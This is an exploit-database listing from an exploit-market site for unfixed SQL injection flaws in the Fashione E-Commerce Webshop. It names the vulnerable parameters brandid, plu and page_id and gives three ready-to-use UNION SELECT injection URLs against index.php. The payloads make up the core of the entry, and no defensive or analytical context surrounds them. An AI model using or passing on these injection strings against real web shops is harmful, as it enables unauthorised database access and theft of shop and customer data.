[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Fashione E-Commerce Webshop Multiple SQL Injection Vulnerabilities

Author
secret
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14121
Category
web applications
Date add
20-09-2010
Platform
php
==================================================================
Fashione E-Commerce Webshop Multiple SQL Injection Vulnerabilities
==================================================================

# Exploit Title: Fashione E-Commerce Webshop Multiple SQL Injection Vulnerabilities
# Date: 2010-09-19
# Author: secret
# Contact : mohammed.atta@hotmail.com / ICQ : 17-33-77
# Site : swissfaking.net/board
# Software Link: http://www.fashione.co.uk/
# Version: All versions so far
# Tested on: XP
 
# Fixed? : NOT FIXED
 
----------------------------------------------------------------------------
 
[Multiple SQL Injection Vulnerabilities] "brandid=" / "plu=" / "page_id="
 
e.g. http://server/index.php?page_id=-1+and+1=0+Union+Select+[VISIBLE],2,3,4
 
e.g. http://server/index.php?page_id=prod&brandid=248&brand_name=LUKE 1977&plu=0001246502+and+1=0+Union+Select+[VISIBLE],2,3,4
 
e.g. http://server/index.php?page_id=prod&brandid=248+and+1=0+Union+Select+[VISIBLE],2,3,4
 
################################################################################################



#  0day.today [2024-12-25]  #